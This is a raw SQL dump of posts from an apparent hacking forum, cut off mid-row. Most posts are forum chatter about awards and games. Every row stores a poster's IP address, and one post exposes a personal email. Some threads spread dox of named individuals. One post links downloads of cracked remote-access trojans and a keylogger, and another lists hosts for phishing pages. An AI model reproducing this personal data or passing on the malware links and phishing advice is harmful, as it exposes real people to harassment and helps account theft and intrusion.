'56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350516875', 'http://www.overclock.net/t/1312965/event-radeon-extravalanza-october-20th-2012-5-000-in-prizing\n\nGoing to this for Counter strike and league of legends weoooo', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '91cb8c3f4718dee0377e15da6883a97a', '0', '0'); INSERT INTO mybb_posts VALUES('5189', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350517892', 'yeah thanks even post in the gaming threads and check out my stuff', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '793a5535f4882b8309df6e494513bda8', '0', '0'); INSERT INTO mybb_posts VALUES('5190', '872', '4872', '24', 'RE: Windows Updates, who uses It?', '0', '262', 'RAND0M1ZER', '1350519353', '[quote=\'R?????zo?\' pid=\'4872\' dateline=\'1350388812\']\r\nwindows updates are crap, theres not even a beta version before so they only test it when we(users) update it and if theres complaints they will just fix it on the next version.\r\n[/quote]\r\n\r\nI haven\'t had any significant issues from Windows update. I think Microsoft is fairly on top of things.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'ebf7c74d459cc31cce6c394c68a36ba2', '0', '0'); INSERT INTO mybb_posts VALUES('5191', '927', '0', '72', 'BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350519699', 'hey l33t i will be telling you some tips in zombies\n\n\n The box will always be in the same spot you found it in as long as you don\'t leave the game back to the main menu. When you die just restart and it will be where you last found it. This is handy for when it\'s behind the first door you unlock.\n\nKnife Zombies till you reach level 4 and then buy the AK74u, unless you can reach the M16 and Claymores. \n\nSpam the box till you get a light machine gun or the ray gun.\n\nWhen you turn on the power it will release the crawlers, at this time i hold up in a crouched position by the juggernog machine, which is an essential purchase.\n\nOtherwise just do laps around from the stage to the alley untill you can get a crowd lined up and then hop in the teleporter and throw grenades down on them.\n\nAnd remeber, should you not already know this, always try to leave 1 zombie alive till you\'ve done all you need to do.\n\nhope you enjoy :)', '203.104.11.11', '-882373877', '1', '0', '257', '1350519722', '1', '54c48100c5e088e3d23bcfcc9e33ae36', '0', '1350519722'); INSERT INTO mybb_posts VALUES('5192', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '228', 'VirtualLegend', '1350520596', 'Good tips, but there are more handy tricks and tips', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '02ee75c6000ce6bd1488f7515b83dc6d', '0', '0'); INSERT INTO mybb_posts VALUES('5193', '927', '5191', '72', 'RE: BLACK OPS ZOMBIE TIPS', '0', '257', 'XxTREYZxX', '1350520795', 'yeah there is but too long to write but thanks for posting\nplus will i get banned for asking people to come here on another forum thanks:)\nwhy is this here above here (wierd)', '203.104.11.11', '-882373877', '1', '0', '257', '1350549817', '1', '6901c9b5d039f252fde48cd26d510af6', '0', '1350549817'); INSERT INTO mybb_posts VALUES('5194', '928', '0', '49', 'MOTM', '0', '257', 'XxTREYZxX', '1350522467', 'hey lH whats up i going to be talking about member of the month,\\who believes we should get MOTM on L33Thacking.net \r\npost yes and why \r\nor\r\nno and why\r\nthanks for your time!;)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '167bf90c7fd54e59fc8d092189d5b659', '0', '0'); INSERT INTO mybb_posts VALUES('5195', '190', '665', '56', 'RE: Copy and paste game', '0', '100', '??zg???g????61', '1350522681', 'jadebabe37@gmail.com\n\nLOL thats my eWhoring paypal xDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd534ccc0b4d8ef99d9cbfd0a5df78835', '0', '0'); INSERT INTO mybb_posts VALUES('5196', '929', '0', '49', 'AWARD SYSTEM', '0', '257', 'XxTREYZxX', '1350522686', 'hey L33T,\r\nwho believes that we should get a award system happening \r\nit would be great :)\r\ncant wait till i get my gamers award:) lol', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '8aa3c6c82087f130fba25cad8a99979b', '0', '0'); INSERT INTO mybb_posts VALUES('5197', '930', '0', '7', 'am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350523176', 'hey l33T, TITLE SAYS IT ALL:)', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '578d51191a68c299f1b127c279ead572', '0', '0'); INSERT INTO mybb_posts VALUES('5198', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '3', '??????????¢™', '1350523832', 'I have never seen you doing anything helpful', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c4053ea7bd2dbe5f9bcf93944f35cfae', '0', '0'); INSERT INTO mybb_posts VALUES('5199', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '3', '??????????¢™', '1350523858', 'I think we should get a award system up.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5bbac2ece203bbbfab209310f677ff0c', '0', '0'); INSERT INTO mybb_posts VALUES('5200', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350523957', 'I have sent the source to everyone above, Enjoy', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e76b0b7f90b7331cdff50ac31a3e20e3', '0', '0'); INSERT INTO mybb_posts VALUES('5201', '907', '5094', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350524065', '[quote=\'iTzIpod\' pid=\'5094\' dateline=\'1350475182\']\r\nBest video on Youtube.\r\n\r\nHer interview reaction:\r\nIt was like Mortal Kombat. And it hurt. \r\n\r\n\r\nOr something along those lines :p\r\n[/quote]\r\n\r\nYep that is the reason I made this edit. First one to do this on youtube.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'b80a4204b66b5b7013975600fb1bd63b', '0', '0'); INSERT INTO mybb_posts VALUES('5202', '928', '5194', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350524200', 'I think we should do this, it would be a great thing.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'a072730a7b53abb7526cc0ff9df3f4cf', '0', '0'); INSERT INTO mybb_posts VALUES('5203', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350524467', 'yeah do you wanna contact t3hjoker for us and ask, and also ask him to make a thread about who would want it :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '2f38043e2c124ef0cdc9d227ec8d79f5', '0', '0'); INSERT INTO mybb_posts VALUES('5204', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '257', 'XxTREYZxX', '1350524520', 'yeah it would be great to have my gamers award hah lol', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'c46c34cff5c19b546d7cab2a5ddc0dd7', '0', '0'); INSERT INTO mybb_posts VALUES('5205', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350524573', 'ok i will help members out :) but i am nice i know i am', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '1d2e09275f6d54c58826a69def100823', '0', '0'); INSERT INTO mybb_posts VALUES('5206', '918', '5088', '65', 'RE: I feel famous', '0', '3', '??????????¢™', '1350524875', 'Of course you will get alot of views because people want to see if he did it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f1063d760738695afb0380702bbf6a41', '0', '0'); INSERT INTO mybb_posts VALUES('5207', '929', '5204', '49', 'RE: AWARD SYSTEM', '0', '3', '??????????¢™', '1350524932', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5204\' dateline=\'1350524520\']\r\nyeah it would be great to have my gamers award hah lol\r\n[/quote]\r\n\r\nNo not really because your gamers group isnt even nothing special.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'd4cdc4184f1ac23f0534a5183ba867eb', '0', '0'); INSERT INTO mybb_posts VALUES('5208', '928', '5203', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350524967', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5203\' dateline=\'1350524467\']\r\nyeah do you wanna contact t3hjoker for us and ask, and also ask him to make a thread about who would want it :)\r\n[/quote]\r\n\r\nHe will see this when he gets online, No need to contact him.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'bdda91a4642c4fd4920609b6371da99a', '0', '0'); INSERT INTO mybb_posts VALUES('5209', '930', '5205', '7', 'RE: am i a nice and helpfull member', '0', '3', '??????????¢™', '1350525033', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5205\' dateline=\'1350524573\']\r\nok i will help members out :) but i am nice i know i am\r\n[/quote]\r\nI dont know if you are nice because I have never talked to you but I know I havent seen you do anything for members here.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c111e97aee41fd4d8d1ddfa9ac2dc8b6', '0', '0'); INSERT INTO mybb_posts VALUES('5210', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350525046', 'yeah true hopefully he does make action of this:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '98765a92f036a353a2548d78a2d254e0', '0', '0'); INSERT INTO mybb_posts VALUES('5211', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350525156', 'yeah i was currently on another forum for a while i only joined to L33T a week or so ,\nthe other forum was UBERS', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '5bee0f36ad1a64da7eb7fafa68a6ace1', '0', '0'); INSERT INTO mybb_posts VALUES('5212', '928', '5194', '49', 'RE: MOTM', '0', '222', 'Exposé', '1350525419', 'Lol yeh I think joker or a super mod should post this...to make it official', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '35525a8f4174917e6508d9eb4629cb1e', '0', '0'); INSERT INTO mybb_posts VALUES('5213', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '257', 'XxTREYZxX', '1350525427', 'I DON\'T CARE I JUST WANT MY GAMERS AWARD BECAUSE IT LOOK COOL \nSORRY FOR THE CAPS, MY BUTTON PLAYS UP ALOT:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '706e5c988c9be3dd65542f5034c48f1d', '0', '0'); INSERT INTO mybb_posts VALUES('5214', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350525444', 'As you wish, just want this to spread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cdb841840de6a42991662203c77aa94a', '0', '0'); INSERT INTO mybb_posts VALUES('5215', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '222', 'Exposé', '1350525459', 'I see you posting alot but I never talk to you so not sure what you do lol..', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '96c9fadb6b7d82f8959e96e9c8baa4e6', '0', '0'); INSERT INTO mybb_posts VALUES('5216', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '222', 'Exposé', '1350525523', 'Joker will implement the award system or enable it when the time is right...let\'s not all get crazy', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a25b3553bda370029d67fbc291eab21b', '0', '0'); INSERT INTO mybb_posts VALUES('5217', '929', '5196', '49', 'RE: AWARD SYSTEM', '0', '1', 't3h jok3r', '1350525546', 'I told you guys multiple times about the awards and groups don\'t have special awards.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '68570f5bce378dd2399c08de2bb88f75', '0', '0'); INSERT INTO mybb_posts VALUES('5218', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '222', 'Exposé', '1350525581', 'I haven\'t been gaming as much because of shit going on in mah life...work...school yeh etc', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '11a96bac9f9a4aca5e9dd63c17e0e6a3', '0', '0'); INSERT INTO mybb_posts VALUES('5219', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350525594', 'yeah cant wait for it :) who do you think would get it BE HONEST :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '928b00cc5f61329e2757a9d796b6e252', '0', '0'); INSERT INTO mybb_posts VALUES('5220', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '1', 't3h jok3r', '1350525605', 'Didn\'t chat with you much so don\'t know nice or not but you do help me with the activity.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f8fd3cd6f55ce6c92172f813b2149764', '0', '0'); INSERT INTO mybb_posts VALUES('5221', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350525636', 'OK...and yeh i got 2 members to join last night by just running it like once or twice', '74.76.76.132', '1246514308', '1', '0', '222', '1350525642', '1', '8aca2f13b39381841515a1cc4f9a8793', '0', '1350525642'); INSERT INTO mybb_posts VALUES('5222', '928', '5194', '49', 'RE: MOTM', '0', '222', 'Exposé', '1350525727', 'The most HQ and active member on the site....personally I think it should be NXK or Pown. And someone who hasn\'t had any troubles on the site...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7604287c9123d4a64b26897ddecc84a9', '0', '0'); INSERT INTO mybb_posts VALUES('5223', '905', '5100', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '1', 't3h jok3r', '1350525787', '[quote=\'HoverCatz\' pid=\'5100\' dateline=\'1350480100\']\r\nNew info: http://pastebin.com/X4pd8bLM, http://pastebin.com/L0FfyFK1\r\n[/quote]\r\n\r\nFirst one got removed. Second one works, can\'t believe a fucking 41 years old old fag would stalk a 15 years old girl.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2a3119375c3a580e2cf7dc6e5c736210', '0', '0'); INSERT INTO mybb_posts VALUES('5224', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '222', 'Exposé', '1350525798', 'Is this similar to the regular pastebin site?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0f888701ae7b6a503e1259ada0d54cfd', '0', '0'); INSERT INTO mybb_posts VALUES('5225', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350525829', 'yeah im am pretty active but not many other people are active wee need more members\nand admin check out MOTM thread we should really do it :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '7cfcd65c2db62a489137c6dc8e635d05', '0', '0'); INSERT INTO mybb_posts VALUES('5226', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '1', 't3h jok3r', '1350525972', 'I watched it again, it\'s funny and your welcome.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09c8657c8bb7726fb43f350541cc736f', '0', '0'); INSERT INTO mybb_posts VALUES('5227', '928', '5194', '49', 'RE: MOTM', '0', '257', 'XxTREYZxX', '1350526034', 'yeah i was thinking NXK and iTzIpod it would be so interesting:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '46fdbd25c3d093b3714275ac955a9487', '0', '0'); INSERT INTO mybb_posts VALUES('5228', '925', '5174', '7', 'RE: gaming thread down(READ)', '0', '257', 'XxTREYZxX', '1350526091', 'yeah i know how it feels bud:)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '9588c922e606c0aed9a69bf7e6b2dac4', '0', '0'); INSERT INTO mybb_posts VALUES('5229', '921', '5120', '4', 'RE: Hey', '0', '1', 't3h jok3r', '1350526136', 'Welcome to L33Thacking.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '27233f5679c3e1295a694e498e86ef8f', '0', '0'); INSERT INTO mybb_posts VALUES('5230', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '3', '??????????¢™', '1350526192', 'I have to admit you are active but havent seen you helping people.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f866421ed28ad9869875b211644800eb', '0', '0'); INSERT INTO mybb_posts VALUES('5231', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '61', 'NXK', '1350526215', 'You\'re not helping by attacking them back.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '24d748355982919ad86eea9b08d65395', '0', '0'); INSERT INTO mybb_posts VALUES('5232', '928', '5194', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350526247', 'Out of NXK and IPod I would have to say NXK.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5c18a6ccd29160115c0f6fae4d160e17', '0', '0'); INSERT INTO mybb_posts VALUES('5233', '916', '5066', '3', 'RE: Subject too long', '0', '1', 't3h jok3r', '1350526305', 'I agree with the OP in fact we received a complaint yesterday about the same thread for being too long. If I increase the number to 90, the title would be too long and annoying so just report them as \"other\".', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'af545825b6de1bf0f0d17b2960681bc1', '0', '0'); INSERT INTO mybb_posts VALUES('5234', '603', '5224', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350526331', '[quote=\'ƒ???????????g\' pid=\'5224\' dateline=\'1350525798\']\r\nIs this similar to the regular pastebin site?\r\n[/quote]\r\n\r\nSomething like it but when you post a paste its not going to show new pastes on the side and stuff. It is only link only sharing so if the person doesnt have the link no one can see it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '0767972e49dca01c2e1ec1ddb47e509d', '0', '0'); INSERT INTO mybb_posts VALUES('5235', '916', '5066', '3', 'RE: Subject too long', '0', '3', '??????????¢™', '1350526430', 'I got that same error when I tried to post on a thread the other day, Kinda annoying. Need to be fixed.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c526608b5c251f8a77d9fe99bf5a4ae7', '0', '0'); INSERT INTO mybb_posts VALUES('5236', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '222', 'Exposé', '1350526450', 'What NXK said....we shouldn\'t antagonize AF or their members...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '65362369cf2936555d95db6e8aee8cb1', '0', '0'); INSERT INTO mybb_posts VALUES('5237', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '1', 't3h jok3r', '1350526542', 'Cool, thanks for the program and advertising guys.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'be56666f1bdbd5d1379ee6adc0dcd8c3', '0', '0'); INSERT INTO mybb_posts VALUES('5238', '931', '0', '19', '[Junk]Joker\'s DOX', '0', '272', 'YuckFou', '1350526766', 'This is a sincere fuck you from Antagonism of AF. We have released your dox - [url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]', '108.171.103.148', '1823172500', '0', '0', '0', '0', '1', '215145bd3787f04a16a72b9edea07e40', '0', '0'); INSERT INTO mybb_posts VALUES('5239', '931', '5238', '19', '[Junk]Joker\'s DOX', '0', '1', 't3h jok3r', '1350526820', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5240', '932', '0', '19', '[Junk]Joker\'s DOX - Updated', '0', '272', 'YuckFou', '1350526964', '[url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]\n\nLink fixed. Suck my dog\'s cock assclown.', '108.171.103.148', '1823172500', '0', '0', '272', '1350526997', '1', 'd83d4f6ebca98d15c76e1ddfdca107bc', '0', '1350526997'); INSERT INTO mybb_posts VALUES('5241', '932', '5240', '19', '[Junk]Joker\'s DOX - Updated', '0', '1', 't3h jok3r', '1350527029', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5242', '933', '0', '19', '[Junk]Joker\'s DOX - Updated', '0', '272', 'YuckFou', '1350527053', '[url=http://katethebait.cwahi.net/myforum/showthread.php?t=771994]http://pastebin.com/fz1SGJCK[/url]\r\n\r\nLink fixed. Suck my dog\'s cock assclown.', '108.171.103.148', '1823172500', '0', '0', '0', '0', '1', 'bbf931b2a4af196fda0bf663d4bb24fb', '0', '0'); INSERT INTO mybb_posts VALUES('5243', '933', '5242', '19', '[Junk]Joker\'s DOX - Updated', '0', '1', 't3h jok3r', '1350527075', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5244', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350527185', 'yeah thats what i am going to start doing thanks for the help', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '931682550bf491fa8356d26d3df0bf14', '0', '0'); INSERT INTO mybb_posts VALUES('5245', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350528512', 'CELEBRATING 5,000 POSTS! Thanks everyone.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8ca59cd67aa5e95ca47f43c3d10521d4', '0', '0'); INSERT INTO mybb_posts VALUES('5246', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '222', 'Exposé', '1350529295', 'Yay oh wow 5,000 posts that is amazing....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b5d4998ab009aa9833874da59a688eaa', '0', '0'); INSERT INTO mybb_posts VALUES('5247', '928', '5194', '49', 'RE: MOTM', '0', '1', 't3h jok3r', '1350529378', 'It\'s a nice idea but can\'t implement this till the awards plugin is back because I want to add a MOTM award too and by the time we get the awards plugin we will have around 950 or 1K threads so by then it should be a great time to add this. I was actually also thinking of a news thing but kinda different from HF for now.\n\n/Discuss', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0e092e65c81da7cef570f534a6dda100', '0', '0'); INSERT INTO mybb_posts VALUES('5248', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1350529579', 'GOD HOW THE VAGINA DID YOU MISS THIS?\n\nOff topic section just reached 1K posts :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '261697a3a068819dc2193b8eae2c271b', '0', '0'); INSERT INTO mybb_posts VALUES('5249', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '5', 'Timmy', '1350529703', 'I think you should add more about us such as what\'s so cool about us and what better stuff we have than HF.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '00bfcd8dc5ea94f3c2172d4c06d01b22', '0', '0'); INSERT INTO mybb_posts VALUES('5250', '928', '5194', '49', 'RE: MOTM', '0', '3', '??????????¢™', '1350529906', 'Thread moved to right section.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c5690e015ac776a0e45d0520978c0584', '0', '0'); INSERT INTO mybb_posts VALUES('5251', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '5', 'Timmy', '1350529944', 'Arrested? No he\'s daughters (If he has) pictures should be online and he should be lifetime prisoned or death sentence.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c80a1da02b2a7b383bf63d0dcf8becb2', '0', '0'); INSERT INTO mybb_posts VALUES('5252', '928', '5194', '49', 'RE: MOTM', '0', '61', 'NXK', '1350529949', 'You guys are making me blush, Stop it. I just do my job that\'s all!\n\n[img]http://24.media.tumblr.com/tumblr_mbrkkruaz41qisl9lo2_500.png[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '50c1f01a1795bdfea7b589bf752b4a18', '0', '0'); INSERT INTO mybb_posts VALUES('5253', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '5', 'Timmy', '1350530002', 'I called him but didn\'t pick up maybe too busy sleeping with his wife.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '99c6e41b30289e4a3bcb98f05f7e130b', '0', '0'); INSERT INTO mybb_posts VALUES('5254', '910', '5021', '49', 'RE: Referral Contest?', '0', '61', 'NXK', '1350530003', 'I approve this, I can try and help out with some of the prizes.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd65243859253a42fcfdc280330030660', '0', '0'); INSERT INTO mybb_posts VALUES('5255', '821', '5056', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '5', 'Timmy', '1350530157', '[quote=\'R?????zo?\' pid=\'5056\' dateline=\'1350461026\']\r\n[quote=\'?(???)?TREYZ?(???)?\' pid=\'5013\' dateline=\'1350448254\']\r\nim thinking what i should post next\r\n[/quote]\r\n\r\nyeah that\'s a good idea :P\r\nI\'m thinking what I should post next too! Oh wait... I posted it\r\n[/quote]\r\n\r\n\r\n+3 on this one lol. I\'m wondering why Kody isn\'t picking up the phone.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '24340f366c19078d6e3fd72b07a0dbc6', '0', '0'); INSERT INTO mybb_posts VALUES('5256', '935', '0', '19', '[Junk][Junk]Couple of cracked programs.', '0', '5', 'Timmy', '1350530747', '(RAT)Blackshades 4.2 cracked -\r\n\r\n. http://sharesend.com/download/lylxt (Untested)\r\n\r\n. http://fs08n1.sendspace.com/dl/eea642d1ec5dc7484517f1707b390a17/502ef28549cb30ff/sbgr3t/blackshades%20cracked.rar (Untested)\r\n\r\n(RAT)Blackshades 5.0 cracked -\r\n\r\n. https://www.dropbox.com/s/n4kw7fxdv32ttm1/BlackShades%205.0.rar (Untested)\r\n\r\n(RAT)Darkcomet PAID cracked -\r\n\r\n(KEYLOGGER)Predator Dynasty 8 Cracked -\r\n\r\n. http://adfoc.us/720388933038 (Untested)\r\n\r\nEnjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '298e7964445e04b02c23fb73db918649', '0', '0'); INSERT INTO mybb_posts VALUES('5257', '936', '0', '18', '4 adf.ly bots with proxygrabber', '0', '5', 'Timmy', '1350531132', '[url=http://postimage.org/image/62s7nniqx/][img]http://s12.postimage.org/62s7nniqx/adfly.jpg[/img][/url]\r\n\r\n\r\n\r\nSCREENSHOT : http://s12.postimage.org/5q0thh0h8/adfly.jpg\r\n\r\nVIRUSSCAN : http://virusscan.jotti.org/en/scanresult/ab534cdeaf447ed8a4885df430a38ce98c847f0b\r\n\r\nDOWNLOAD : http://adf.ly/DnH3h', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1643ae443f2fb505d19f40b83e6562ad', '0', '0'); INSERT INTO mybb_posts VALUES('5258', '937', '0', '19', '[Junk]Nude Bot- Mr. Do you want to fap?', '0', '5', 'Timmy', '1350531240', '[b][align=center][color=#1E90FF]Nude Bot is now fixed and uses new-site. This works perfectly now and no-more non-nude pictures.[/color]\n\n- Use this to fap, sirs. :D\n\n[/align][/b]\n\nCredits: nitro_hitman', '72.231.24.165', '1223104677', '1', '0', '5', '1350531261', '1', 'd330687ee5a7a328f17c9352226fa199', '0', '1350531261'); INSERT INTO mybb_posts VALUES('5259', '938', '0', '46', 'List of good webhosts to host your phishing pages', '0', '5', 'Timmy', '1350531544', '[b]FREE HOSTS[/b]\r\n[list]\r\n[*][url=http://freehostia.com/]Freehostia[/url] - Recommended by [url=http://community.mybboard.net/member.php?action=profile&uid=13901]nathangrubb[/url]\r\nComments: \"A free host, with no artificial limitations like some free hosts. Just like a paid host, except the bandwidth, disk space, etc limits.\"\r\n[*][url=http://x10hosting.com/]x10Hosting[/url] - Recommended by [url=http://community.mybboard.net/member.php?action=profile&uid=13967]fedlerner[/url]\r\nComments: \"x10hosting is the top 1 free hosting company. They offer Ad-Enhanced & Ad-Free plans. Their servers are really fast and reliable. They also have paid plans (on different servers) for members that think that their site has grown enough to move to a Paid hosting.\"\r\n[b]NOTE:[/b] Please see [wiki]Help:Contents#Host-specific_Problems[/wiki]\r\n[*][url=http://www.shockv2.com/]Sv2[/url] - Recommended by [url=http://community.mybboard.net/user-13787.html]Holy Phoenix[/url]\r\nComments: \"It is a free host, that offers stuff without posting. I believe they give more if you do post though.\"\r\n[*][url=http://www.vgchat.info]vgchat hosting[/url] - Recommended by [url=http://community.mybboard.net/user-3500.html]scylla[/url]\r\nComments: \"A free host that gives users 300 megs of space & 10 gigs of bandwith, more than enough for an average forum, I\'ve been with them for nearly a year now.\" \r\n[*][url=http://phpzilla.net] PhpZilla[/url] - Recommended by [url=http://community.mybboard.net/user-17716.html]Proper[/url]\r\nComments: \"a good free host.\"\r\n[/list]\r\n\r\nRecommended by MyBB Community.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '42c187ae2a6d1d60f4812119f6e2d422', '0', '0'); INSERT INTO mybb_posts VALUES('5260', '877', '4747', '11', 'RE: could some one teach how to hack facebook tetrisfreinds', '0', '8', 'spacefish36', '1350531947', 'I know how to hack Facebooks but what\'s tetrisfreinds?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '94637ffabf40960c124be2ec7476fe67', '0', '0'); INSERT INTO mybb_posts VALUES('5261', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '262', 'RAND0M1ZER', '1350536241', 'Link? What is it? Does it display pictures or something?', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'd41a50838a5d53eb4a49b55beda837ec', '0', '0'); INSERT INTO mybb_posts VALUES('5262', '816', '4276', '9', 'RE: | Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '262', 'RAND0M1ZER', '1350536288', 'Thanks for the list, I will definitely check some of these out. I\'ve got a few content blogs I\'d like to promote.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'ec61a53d1533c3cbc261a8029edc826d', '0', '0'); INSERT INTO mybb_posts VALUES('5263', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '262', 'RAND0M1ZER', '1350536428', 'I used Freehostia before I moved to paid hosting. Definitely recommended, they had very little down time.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'edab280b76b5a20e1b198a38e4bd0b5e', '0', '0'); INSERT INTO mybb_posts VALUES('5264', '910', '5021', '49', 'RE: Referral Contest?', '0', '222', 'Exposé', '1350536733', 'Nice sweet , I think we could refer alot of members by doing this :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0970c26d502cdf901f4e078b52e2a11d', '0', '0'); INSERT INTO mybb_posts VALUES('5265', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '222', 